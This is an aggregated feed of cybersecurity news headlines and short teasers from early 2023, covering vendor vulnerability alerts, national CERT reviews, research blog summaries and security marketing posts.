https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/ttn_17022023
Cyber security of social welfare and healthcare services is improved in many networks
2023-02-22T11:48:31Z | 1677066511

Continuity of operations of social welfare and healthcare services is ever more dependent on cyber security. Cooperation takes place on many fronts in Finland and elsewhere in order to improve sector's cyber security. Traficom's National Cyber Security Centre participates in many of the networks. The NCSC facilitates some of the networks, and participates as a member in others. Large part of cooperation is done in voluntary groups.

https://www.kyberturvallisuuskeskus.fi/en/fi/ajankohtaista/ttn_17022023
Security Alert (A23-02-18): Multiple Vulnerabilities in VMware Products
2023-02-22T04:00:00Z | 1677038400

VMware has published security advisories to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
What?s New for Developers: February 2023
2023-02-21T14:00:00Z | 1676988000

Read about the most recent updates to EdgeWorkers, two new Postman collections, and Terraform Provider v3.3.0 ? and find out how to sign up for betas.

https://www.akamai.com/blog/developers/whats-new-for-developers-february-2023
The National Cyber Security Centre Finland’s weekly review – 7/2023
2023-02-21T13:24:23Z | 1676985863

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 10–16 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-72023
The National Cyber Security Centre Finland’s weekly review – 7/2023
2023-02-21T13:24:23Z | 1676985863

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 10–16 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-72023
Escaping misconfigured VSCode extensions
2023-02-21T13:00:50Z | 1676984450

TL;DR: This two-part blog series will cover how I found and disclosed three vulnerabilities in VSCode extensions and one vulnerability in VSCode itself (a security mitigation bypass assigned CVE-2022-41042 and awarded a $7,500 bounty). We will identify the underlying cause of each vulnerability and create fully working exploits to demonstrate how an […]

https://blog.trailofbits.com/2023/02/21/vscode-extension-escape-vulnerability/
Akamai?s Differentiated Cloud Strategy
2023-02-21T13:00:00Z | 1676984400

Akamai is taking a different approach to cloud computing than providers who base their platforms solely on core data centers. Read more about our strategy.

https://www.akamai.com/blog/cloud/akamai-differentiated-cloud-strategy
Artemis vulnerability scanner is now open source
2023-02-21T10:00:00Z | 1676973600

The Artemis vulnerability scanner is now open source! Artemis is a tool developed by the CERT Polska team and initiated by the KN Cyber science club of Warsaw University of Technology. The tool is built to find website misconfigurations and vulnerabilities on a large scale. Thanks to its modular architecture, it can combine the results of various other tools in a single place.

https://cert.pl/en/posts/2023/02/artemis-open-source/
January cyber weather published with new form and look
2023-02-21T08:35:48Z | 1676968548

The cyber weather reports were revamped for 2023. In addition to an updated look, some of the contents are also new. The report is targeted at organisations. The objective of our cyber weather publications is to report on cyber events in a concise and easy-to-understand form. Cyber weather supplements our Weekly review and summarises the key events of each month.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_01/2023
January cyber weather published with new form and look
2023-02-21T08:35:48Z | 1676968548

The cyber weather reports were revamped for 2023. In addition to an updated look, some of the contents are also new. The report is targeted at organisations. The objective of our cyber weather publications is to report on cyber events in a concise and easy-to-understand form. Cyber weather supplements our Weekly review and summarises the key events of each month.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_01/2023
Security Convergence in the Cloud: Protect More, Worry Less
2023-02-20T08:57:05Z | 1676883425

Many organizations struggle with an array of security point products that create security gaps, alert overload, and inconsistent policy configuration and enforcement challenges. As a result, many companies realize the benefit of moving toward an enhanced security platform that combines multiple security technologies into a single solution. There are two approaches to achieve this: Convergence... The post Security Convergence in the Cloud: Protect More, Worry Less appeared first on Cato Networks.

https://www.catonetworks.com/blog/security-convergence-in-the-cloud-protect-more-worry-less/
Achieving Zero Trust Maturity with Cato SSE 360
2023-02-19T10:07:34Z | 1676801254

The post Achieving Zero Trust Maturity with Cato SSE 360 appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-achieving-zero-trust-maturity
Akamai?s Perspective on February?s Patch Tuesday 2023
2023-02-17T06:00:00Z | 1676613600

Every Patch Tuesday stirs up the community. Read Akamai's insights and recommendations for February 2023. Learn what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-february-2023
High Threat Security Alert (A23-02-17): Multiple Vulnerabilities in Fortinet Products
2023-02-17T04:00:00Z | 1676606400

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
IDC MarketScape Names Akamai a Contender in Worldwide Public Cloud IaaS
2023-02-16T14:00:00Z | 1676556000

Akamai?s inclusion as a Contender in the "IDC MarketScape: Worldwide Public Cloud Infrastructure as a Service Vendor Assessment" demonstrates the strength of our cloud computing services.

https://www.akamai.com/blog/cloud/idc-marketscape-names-akamai-a-contender
A SASE Approach to Enterprise Ransomware Protection
2023-02-16T13:13:14Z | 1676553194

Ransomware continues to be a prime cyber threat to organizations of all sizes. One thesis for this is that these attacks are easier and less expensive to execute than ever before, while offering very high rates of return for cybercriminals. Since the 2017 WannaCry epidemic, the ransomware industry has evolved through several stages, including: Ransomware... The post A SASE Approach to Enterprise Ransomware Protection appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-sase-approach-to-enterprise-ransomware-protection/
Readline crime: exploiting a SUID logic bug
2023-02-16T13:00:00Z | 1676552400

I discovered a logic bug in the readline dependency that partially reveals file information when parsing the file specified in the INPUTRC environment variable. This could allow attackers to move laterally on a box where sshd is running, a given user is able to login, and the user’s private key […]

https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/
Küberpööre: riik piloteerib väiksemate tööstusettevõtete kübertoetust
2023-02-16T11:59:06Z | 1676548746

Riigi Infosüsteemi Amet ja EAS/Kredex ühendasutus soovivad märtsist alates piloteerida küberturvalisuse kaardistamiseks ja parendamiseks mõeldud toetusi tööstussektori väikese- ja keskmise suurusega ettevõtetele.

https://ria.ee/uudised/kuberpoore-riik-piloteerib-vaiksemate-toostusettevotete-kubertoetust
6 Steps to SASE Adoption
2023-02-16T10:21:27Z | 1676542887

SASE adoption requires business and technological planning. By properly preparing for the transition, you will be able to successfully move your business-critical networking and security capabilities to a vendor-delivered service. You will also have the answers to any board and leadership questions. What does a good SASE adoption plan look like? Below we list six... The post 6 Steps to SASE Adoption appeared first on Cato Networks.

https://www.catonetworks.com/blog/6-steps-to-sase-adoption/
PPA vahetab välja Selverites väljastatud ID-kaardid
2023-02-16T05:35:58Z | 1676525758

Politsei- ja Piirivalveamet (PPA) peab lõpetama Riigi Infosüsteemi Ameti (RIA) ettekirjutuse tõttu alates tänasest ajutiselt Selveris ID-kaartide, elamisloakaartide ja digitaalsete isikutunnistuste väljastamise ning tunnistab kehtetuks seal juba väljastatud kaartide sertifikaadid. Inimestele, keda see otsus puudutab, toodetakse kiirkorras uued kaardid ja nendega võetakse isiklikult ühendust.

https://ria.ee/uudised/ppa-vahetab-valja-selverites-valjastatud-id-kaardid
Security Alert (A23-02-16): Multiple Vulnerabilities in Cisco Products
2023-02-16T04:00:00Z | 1676520000

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
Server-side prototype pollution: Black-box detection without the DoS
2023-02-15T16:30:00Z | 1676478600

Server-side prototype pollution is hard to detect black-box without causing a DoS. In this post, we introduce a range of safe detection techniques, which we've also implemented in an open source Burp

https://portswigger.net/research/server-side-prototype-pollution
Magecart Attack Disguised as Google Tag Manager
2023-02-15T14:00:00Z | 1676469600

Magecart skimmers constantly evolve. Recent attacks aimed at stealing sensitive customer information illustrate the need for comprehensive security solutions.

https://www.akamai.com/blog/security/magecart-attack-disguised-as-google-tag-manager
High Threat Security Alert (A23-02-13): Multiple Vulnerabilities in Microsoft Products (February 2023)
2023-02-15T04:00:00Z | 1676433600

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-14): Multiple Vulnerabilities in Firefox
2023-02-15T04:00:00Z | 1676433600

Mozilla has published the advisories (MFSA2023-05 and MFSA2023-06) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-15): Multiple Vulnerabilities in Citrix Products
2023-02-15T04:00:00Z | 1676433600

Citrix released security advisories to address multiple vulnerabilities in Citrix products.

https://www.govcert.gov.hk/en/alerts_detail.php
The National Cyber Security Centre Finland’s weekly review – 6/2023
2023-02-14T14:49:59Z | 1676386199

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 3–9 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/node/10061
The National Cyber Security Centre Finland’s weekly review – 6/2023
2023-02-14T14:49:59Z | 1676386199

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 3–9 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/node/10061
cURL audit: How a joke led to significant findings
2023-02-14T13:00:14Z | 1676379614

In fall 2022, Trail of Bits audited cURL, a widely-used command-line utility that transfers data between a server and supports various protocols. The project coincided with a Trail of Bits maker week, which meant that we had more manpower than we usually do, allowing us to take a nonstandard approach to the […]

https://blog.trailofbits.com/2023/02/14/curl-audit-fuzzing-libcurl-command-line-interface/
Strategic Roadmap to SASE
2023-02-14T12:47:26Z | 1676378846

Introduction Since Gartner introduced the Secure Access Service Edge (SASE) category in 2019, interest from enterprises has grown substantially. SASE transforms enterprise IT through the convergence of enterprise networking and network security into a single, cloud-native, service. It aims to optimize security posture, enable zero-trust access from anywhere, and reduce costs and complexity. Given its... The post Strategic Roadmap to SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/strategic-roadmap-to-sase/
Akamai Connected Cloud: The World?s Most Distributed Cloud Platform
2023-02-14T06:00:00Z | 1676354400

Introducing Akamai Connected Cloud, the massively distributed edge and cloud platform for cloud computing, security, and content delivery.

https://www.akamai.com/blog/cloud/akamai-connected-cloud-most-distributed-cloud-platform
High Threat Security Alert (A23-02-11): Multiple Vulnerabilities in Apple iOS and iPadOS
2023-02-14T04:00:00Z | 1676347200

Apple has released iOS 16.3.1 and iPadOS 16.3.1 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-12): Vulnerability in SonicWall Email Security
2023-02-14T04:00:00Z | 1676347200

SonicWall has released a security advisory to address an information disclosure vulnerability in SonicWall Email Security.

https://www.govcert.gov.hk/en/alerts_detail.php
SonicWall Email Security Information Discloser Vulnerability
2023-02-13T21:59:15Z | 1676325555

SonicWall Email Security contains a vulnerability that could permit a remote unauthenticated attacker access to an error page that includes sensitive information about users email addresses. CVE: CVE-2023-0655 Last updated: Feb. 13, 2023, 9:59 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0002
Cato Networks SASE Threat Research Report H2/2022
2023-02-12T14:57:35Z | 1676213855

The post Cato Networks SASE Threat Research Report H2/2022 appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-networks-sase-threat-research-report/
Managing Hype Events to Delight Customers, Not Bot Operators
2023-02-10T14:00:00Z | 1676037600

Learn how to prepare for your hype event so you ensure your goods are available for your loyal customers ? and not bots.

https://www.akamai.com/blog/security/managing-hype-events-to-delight-customers
Security Alert (A23-02-09): Multiple Vulnerabilities in Microsoft Edge
2023-02-10T04:00:00Z | 1676001600

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-10): Multiple Vulnerabilities in OpenSSL
2023-02-10T04:00:00Z | 1676001600

OpenSSL has released 1.1.1t and 3.0.8 to fix the vulnerabilities in various versions of OpenSSL.

https://www.govcert.gov.hk/en/alerts_detail.php
Statement About the DoS Vulnerability in the E5573Cs-322
2023-02-10T00:00:00Z | 1675987200

//www.huawei.com/en/psirt/security-notices/2021/huawei-sn-20230210-01-dos-en
Impact of OpenSSL Vulnerabilities Advisory Released On February 7, 2023
2023-02-09T23:51:09Z | 1675986669

OpenSSL has released a security advisory to address multiple vulnerabilities affecting OpenSSL versions 3.0, 1.1.1, and 1.0.2.CVE-2023-0286 - X.400 address type confusion in X.509 GeneralNameCVE-2022-4304 - Timing Oracle in RSA DecryptionCVE-2022-4203 - X.509 Name Constraints Read Buffer OverflowCVE-2023-0215 - Use-after-free following BIO_new_NDEFCVE-2022-4450 - Double free after calling PEM_read_bio_exCVE-2023-0216 - Invalid pointer dereference in d2i_PKCS7 functionsCVE-2023-0217 - NULL dereference validating DSA public keyCVE-2023-0401 - NULL dereference during PKCS7 data verificationSonicWall is investigating its product line to determine which products and cloud services may be affected by this vulnerability and the Affected and Fixed Products(s) list can change as more information becomes available. CVE: CVE-2023-0286, CVE-2022-4304, CVE-2022-4203, CVE-2023-0215, CVE-2022-4450, CVE-2023-0216, CVE-2023-0217, CVE-2023-0401 Last updated: April 20, 2023, 11:28 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0003
The Resurrection of CVE-2021-21974: The Ransomware Attack on VMware ESXI Hypervisors that Doesn’t Seem to Go Away
2023-02-09T15:10:08Z | 1675955408

An old vulnerability has recently been making waves in the world of cybersecurity, and that is the catchily named CVE-2021-21974. The ransomware attack that exploits a vulnerability in VMware ESXi hypervisors, has reportedly hit over 500 machines this past weekend. Shodan data indicates that many servers were initially hosted in the OVHcloud, but the blast... The post The Resurrection of CVE-2021-21974: The Ransomware Attack on VMware ESXI Hypervisors that Doesn’t Seem to Go Away appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-resurrection-of-cve-2021-21974-the-ransomware-attack-on-vmware-esxi-hypervisors-that-doesnt-seem-to-go-away/
First companies granted support for the development of information security to speed up security improvement measures
2023-02-09T14:43:15Z | 1675953795

The Finnish Transport and Communications Agency Traficom has granted support for the development of information security to first companies. The work to process the rest of the applications is in full swing, but the last companies to submit their applications still have to wait for the decision on whether they are granted support.

https://www.kyberturvallisuuskeskus.fi/en/news/first-companies-granted-support-development-information-security-speed-security-improvement
First companies granted support for the development of information security to speed up security improvement measures
2023-02-09T14:43:15Z | 1675953795

The Finnish Transport and Communications Agency Traficom has granted support for the development of information security to first companies. The work to process the rest of the applications is in full swing, but the last companies to submit their applications still have to wait for the decision on whether they are granted support.

https://www.kyberturvallisuuskeskus.fi/en/news/first-companies-granted-support-development-information-security-speed-security-improvement
Akamai Recognized as a 2023 Gartner� Peer Insights? Customers' Choice for Cloud WAAP
2023-02-09T14:00:00Z | 1675951200

Customers rate Akamai as a 2023 Customers' Choice for Cloud WAAP for the fourth consecutive year on Gartner� Peer Insights.?

https://www.akamai.com/blog/security/akamai-2023-customers-choice-cloud-waap
Jaanuaris jätkusid küberründed Eesti riigiasutuste ja ettevõtete vastu
2023-02-09T12:53:56Z | 1675947236

Riigi Infosüsteemi Amet (RIA) registreeris jaanuaris 188 küberintsidenti, mis mõjutasid ettevõtete, ametite ja teenuste tööd või tekitasid inimestele kahju. Lisaks hoiatab ameti värske ohuhinnang lunavararünnakute eest.

https://ria.ee/uudised/jaanuaris-jatkusid-kuberrunded-eesti-riigiasutuste-ja-ettevotete-vastu
The Future of Network Security: Cybersecurity Predictions for 2023 & Beyond
2023-02-09T10:19:38Z | 1675937978

With the increased of cloud adoption has come an expansion of the corporate digital attack surface. Cyber criminals are constantly evolving their tools and techniques, creating new threats, and pushing organizations to the brink.  As new trends emerge in both cyber attacks and defenses every year, we have decided to list our predictions for the... The post The Future of Network Security: Cybersecurity Predictions for 2023 & Beyond appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-future-of-network-security-cybersecurity-predictions-for-2023-beyond/
Olukord küberruumis – jaanuar 2023
2023-02-09T09:53:37Z | 1675936417

Jaanuaris registreerisime 188 mõjuga intsidenti, mis on viimase poole aasta kõige madalam näitaja.

https://ria.ee/uudised/olukord-kuberruumis-jaanuar-2023
Top 10 web hacking techniques of 2022
2023-02-08T14:20:30Z | 1675866030

Welcome to the Top 10 Web Hacking Techniques of 2022, the 16th edition of our annual community-powered effort to identify the most important and innovative web security research published in the last

https://portswigger.net/research/top-10-web-hacking-techniques-of-2022
The National Cyber Security Centre Finland’s weekly review – 5/2023
2023-02-08T07:48:46Z | 1675842526

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 27 January–2 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-52023
The National Cyber Security Centre Finland’s weekly review – 5/2023
2023-02-08T07:48:46Z | 1675842526

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 27 January–2 February 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-52023
Security Alert (A23-02-08): Multiple Vulnerabilities in Google Chrome
2023-02-08T04:00:00Z | 1675828800

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Advisory - Identity Authentication Bypass Vulnerability in The Huawei Children Smart Watch (Simba-AL00)
2023-02-08T00:00:00Z | 1675814400

//www.huawei.com/en/psirt/security-advisories/2023/huawei-sa-iabvithcswsa-c385b2dc-en
Kontrolli, kas dokumendid kehtivad ja PIN-koodid on olemas
2023-02-07T15:25:14Z | 1675783514

PPA, MTA ja RIA tuletavad meelde, et enne tulude deklareerimist tasub üle kontrollida dokumentide kehtivusaeg ja PIN-koodide olemasolu.

https://ria.ee/uudised/kontrolli-kas-dokumendid-kehtivad-ja-pin-koodid-olemas
Cato SASE Cloud’s “Innovation” and “Platform Play” Earn “Leader” and “Outperformer” Status in GigaOm SD-WAN Radar Report
2023-02-07T13:00:00Z | 1675774800

Today we announced that Cato Networks was named a “Leader” and “Outperformer” by GigaOm in the analyst firm’s Radar for SD-WAN Report. This is our first year to be included in the report and already we shot to the top of the leader’s circle, underscoring the strength and maturity of Cato SD-WAN and showing the... The post Cato SASE Cloud’s “Innovation” and “Platform Play” Earn “Leader” and “Outperformer” Status in GigaOm SD-WAN Radar Report appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-sase-clouds-innovation-and-platform-play-earn-leader-and-outperformer-status-in-gigaom-sd-wan-radar-report/
Cursos CERT.br: Inscrições 2023 Abertas
2023-02-07T11:00:00Z | 1675767600

Estão abertas as inscrições para as turmas 2023 dos cursos ministrados pelo CERT.br: https://cursos.cert.br/inscricao/ Em 2023 o CERT.br ministrará os seguintes cursos: Overview of Creating and Managing CSIRTs Foundations of Incident Management Advanced Topics in Incident Handling

https://cursos.cert.br/inscricao/
Security Alert (A23-02-07): Multiple Vulnerabilities in Android
2023-02-07T04:00:00Z | 1675742400

Google has released Android Security Bulletin February 2023 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
Offensive and Defensive AI: Let’s chat(GPT) About It
2023-02-06T13:51:03Z | 1675691463

The post Offensive and Defensive AI: Let’s chat(GPT) About It appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-offensive-and-defensive-chatgpt
Security Alert (A23-02-04): Vulnerability in Microsoft Edge
2023-02-06T04:00:00Z | 1675656000

Microsoft released a security update to address a vulnerability in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-05): Vulnerability in VMware Workstation
2023-02-06T04:00:00Z | 1675656000

VMware has published a security advisory to address a vulnerability in VMware Workstation.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-06): Multiple Vulnerabilities in F5 Products
2023-02-06T04:00:00Z | 1675656000

F5 has published security advisories to address multiple vulnerabilities in F5 devices.

https://www.govcert.gov.hk/en/alerts_detail.php
4 Key Takeaways from the Akamai Retail Reimagined Bootcamp Indonesia
2023-02-03T14:00:00Z | 1675432800

Read about insights gleaned from the recent Akamai ecommerce bootcamp in Indonesia on how to build growth in a post-pandemic economy.

https://www.akamai.com/blog/security/4-key-takeaways-akamai-retail-reimagined-bootcamp-indonesia
RIA: 2022. aasta küberründed ületasid aprillirahutuse aegseid sajakordselt
2023-02-03T09:39:39Z | 1675417179

2022. aastal toimus Eesti küberruumis 2672 küberintsidenti, mis mõjutasid Eesti inimesi, ettevõtteid ja teenuseid. Suurima kasvu tegid ummistusrünnakud, mida kasutatakse aina enam välispoliitilise mõjutusvahendina.

https://ria.ee/uudised/ria-2022-aasta-kuberrunded-uletasid-aprillirahutuse-aegseid-sajakordselt
Political scientist Thomas Rid and US cyber chief Jen Easterly among speakers confirmed for CYBERUK 2023
2023-02-03T08:07:30Z | 1675411650

The UK government's CYBERUK 2023 event takes place 19-20 April at the ICC Belfast.

https://www.ncsc.gov.uk/news/political-scientist-and-us-cyber-chief-among-speakers-confirmed-for-cyberuk-2023
Research and development of cyber security reinforced in Finland and Europe – the European Cybersecurity Competence Centre’s National Coordination Centre is now operational in Finland
2023-02-03T08:06:07Z | 1675411567

The European Cybersecurity Industrial, Technology and Research Competence Centre’s National Coordination Centre began operations officially in early 2023 under the Finnish Transport and Communications Agency. The centre is part of the European Union’s Network of National Coordination Centres. The purpose of the EU-wide network is to improve national cybersecurity capacities, support cyber security research and accelerate technological development in the EU.

https://www.kyberturvallisuuskeskus.fi/en/news/research-and-development-cyber-security-reinforced-finland-and-europe-european-cybersecurity
Research and development of cyber security reinforced in Finland and Europe – the European Cybersecurity Competence Centre’s National Coordination Centre is now operational in Finland
2023-02-03T08:06:07Z | 1675411567

The European Cybersecurity Industrial, Technology and Research Competence Centre’s National Coordination Centre began operations officially in early 2023 under the Finnish Transport and Communications Agency. The centre is part of the European Union’s Network of National Coordination Centres. The purpose of the EU-wide network is to improve national cybersecurity capacities, support cyber security research and accelerate technological development in the EU.

https://www.kyberturvallisuuskeskus.fi/en/news/research-and-development-cyber-security-reinforced-finland-and-europe-european-cybersecurity
How SASE is Transforming the Manufacturing Industry
2023-02-02T14:31:09Z | 1675348269

The manufacturing industry is constantly evolving. The revolution known as Industry 4.0 is introducing new technologies and innovations that are accelerating digitization and improving efficiency and productivity. One of these new innovations technologies is SASE (Secure Access Service Edge). What is SASE? SASE is an enterprise networking and security category that converges network and security... The post How SASE is Transforming the Manufacturing Industry appeared first on Cato Networks.

https://www.catonetworks.com/blog/how-sase-is-transforming-the-manufacturing-industry/
Feature Spotlight: Kubernetes Enforcement
2023-02-02T14:00:00Z | 1675346400

Akamai?s new enforcement capabilities for K8s environments provides segmentation for applications and blocks lateral movement to, from, and inside K8s clusters.

https://www.akamai.com/blog/security/feature-spotlight-kubernetes-enforcement
Security Alert (A23-02-03): Multiple Vulnerabilities in Cisco Products
2023-02-02T04:00:00Z | 1675310400

Cisco released security advisories to address multiple vulnerabilities in Cisco devices and software.

https://www.govcert.gov.hk/en/alerts_detail.php
ESTsoft Alyac NT header out of bounds read
2023-02-02T00:00:00Z | 1675296000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1682
Moxa SDS-3008 Series Industrial Ethernet Switch web application stored cross-site scripting vulnerability
2023-02-02T00:00:00Z | 1675296000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1619
Moxa SDS-3008 Series Industrial Ethernet Switch web server denial of service vulnerability
2023-02-02T00:00:00Z | 1675296000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1618
Moxa SDS-3008 Series Industrial Ethernet Switch web application cleartext transmission vulnerability
2023-02-02T00:00:00Z | 1675296000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1616
Moxa SDS-3008 Series Industrial Ethernet Switch web application information disclosure vulnerability
2023-02-02T00:00:00Z | 1675296000

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1621
7 Key Takeaways for Financial Services from Recent Research
2023-02-01T15:00:00Z | 1675263600

Although the financial services cybersecurity programs are some of the most mature in the world, cybercriminals continue to find ways to revitalize old attacks.

https://www.akamai.com/blog/security/7-key-takeaways-for-financial-services-from-recent-research
Killnet Targets Healthcare ? What You Need to Know, What You Need to Do
2023-02-01T06:00:00Z | 1675231200

As the war in Ukraine continues to heat up, the war against cyberattacks at home also intensifies as pro-Russia group Killnet targets healthcare organizations.

https://www.akamai.com/blog/news/killnet-targets-healthcare
Security Alert (A23-02-01): Vulnerability in VMware vRealize Operations
2023-02-01T04:00:00Z | 1675224000

VMware has published a security advisory to address a vulnerability in VMware vRealize Operations.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A23-02-02): Vulnerability in QNAP Products
2023-02-01T04:00:00Z | 1675224000

QNAP has published a security advisory to address a vulnerability in QNAP QTS and QNAP QuTS hero.

https://www.govcert.gov.hk/en/alerts_detail.php
Can't Wait to Shut You Down ? Remote DoS Using Wininit.exe
2023-01-31T15:00:00Z | 1675177200

Akamai researchers explore a new vulnerability that can be exploited to lead to denial-of-service attacks against Windows machines.

https://www.akamai.com/blog/security-research/cant-wait-to-shut-you-down-msrpc-wininit
Introducing Malware Protection for Scanning File Uploads
2023-01-31T14:00:00Z | 1675173600

With Malware Protection, you can scan once at the edge and prevent malware from draining your time and budget.

https://www.akamai.com/blog/edge/introducing-malware-protection-for-scanning-file-uploads
The National Cyber Security Centre Finland’s weekly review – 4/2023
2023-01-31T09:50:22Z | 1675158622

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 20–26 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-42023
The National Cyber Security Centre Finland’s weekly review – 4/2023
2023-01-31T09:50:22Z | 1675158622

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 20–26 January 2023). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-42023
Regulation makes smart devices more secure
2023-01-31T09:44:37Z | 1675158277

Consumers may sometimes end up buying devices with poor information security features. This will change on 1 August 2024, when devices that do not meet the relevant information security requirements can be withdrawn from the market. To prepare for future rules, manufacturers, importers and vendors must immediately ensure that their products are sufficiently secure.

https://www.kyberturvallisuuskeskus.fi/en/news/regulation-makes-smart-devices-more-secure
Regulation makes smart devices more secure
2023-01-31T09:44:37Z | 1675158277

Consumers may sometimes end up buying devices with poor information security features. This will change on 1 August 2024, when devices that do not meet the relevant information security requirements can be withdrawn from the market. To prepare for future rules, manufacturers, importers and vendors must immediately ensure that their products are sufficiently secure.

https://www.kyberturvallisuuskeskus.fi/en/news/regulation-makes-smart-devices-more-secure
Don’t Renew Your SD-WAN Contract Before Watching This Webinar
2023-01-31T09:33:14Z | 1675157594

The post Don’t Renew Your SD-WAN Contract Before Watching This Webinar appeared first on Cato Networks.

https://catonetworks.easywebinar.live/registration-dont-renew-your-sd-wan-contract-before-watching-this
The SSE RFP/RFI Template (or how to evaluate SSE Vendors)
2023-01-31T09:08:28Z | 1675156108

Your SSE project is coming up. As an IT professional, you will soon need to organize the requirements for your enterprise’s security transformation journey. To assist with this task, we’ve created a complimentary RFP template for your use. This template will help you ensure your current and future security threats are addressed and that your... The post The SSE RFP/RFI Template (or how to evaluate SSE Vendors) appeared first on Cato Networks.

https://www.catonetworks.com/blog/the-sse-rfp-rfi-template-for-sse-vendors/
Fidelis Security Platforms Added to The Naspo Valuepoint Contract
2023-01-31T05:08:09Z | 1675141689

Bethesda, MD (BusinessWire) – January 31, 2023 – Fidelis Security, a portfolio company of Skyview Capital, today announced its platforms have been added to the National Association of State Procurement Officials (NASPO) ValuePoint contract held by Carahsoft Technology Corp. The contract addition enables Carahsoft to provide Fidelis Security platforms to participating States, Local Governments, and […] The post Fidelis Security Platforms Added to The Naspo Valuepoint Contract appeared first on Fidelis Security.

https://fidelissecurity.com/press/fidelis-security-platforms-added-to-the-naspo-valuepoint-contract/
Achieving Zero Trust Maturity with Cato SSE 360
2023-01-30T07:48:49Z | 1675064929

The post Achieving Zero Trust Maturity with Cato SSE 360 appeared first on Cato Networks.

https://www.catonetworks.com/resources/achieving-zero-trust-maturity-with-cato-sse-360/
Security Alert (A23-01-17): Multiple Vulnerabilities in Microsoft Edge
2023-01-30T04:00:00Z | 1675051200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Which SSE Can Replace the Physical Datacenter Firewalls?
2023-01-29T10:40:04Z | 1674988804

The post Which SSE Can Replace the Physical Datacenter Firewalls? appeared first on Cato Networks.

https://www.catonetworks.com/resources/which-sse-can-replace-the-physical-datacenter-firewalls/
SEABORGIUM and TA453 continue their respective spear-phishing campaigns against targets of interest
2023-01-27T10:54:16Z | 1674816856

Activity against targeted organisations and individuals in the UK and other areas of interest.

https://www.ncsc.gov.uk/news/spear-phishing-campaigns-targets-of-interest
A Leading Network Operator in Europe Extends SS8’s Emergency Caller Location Solution to 5G
2023-01-27T00:28:19Z | 1674779299

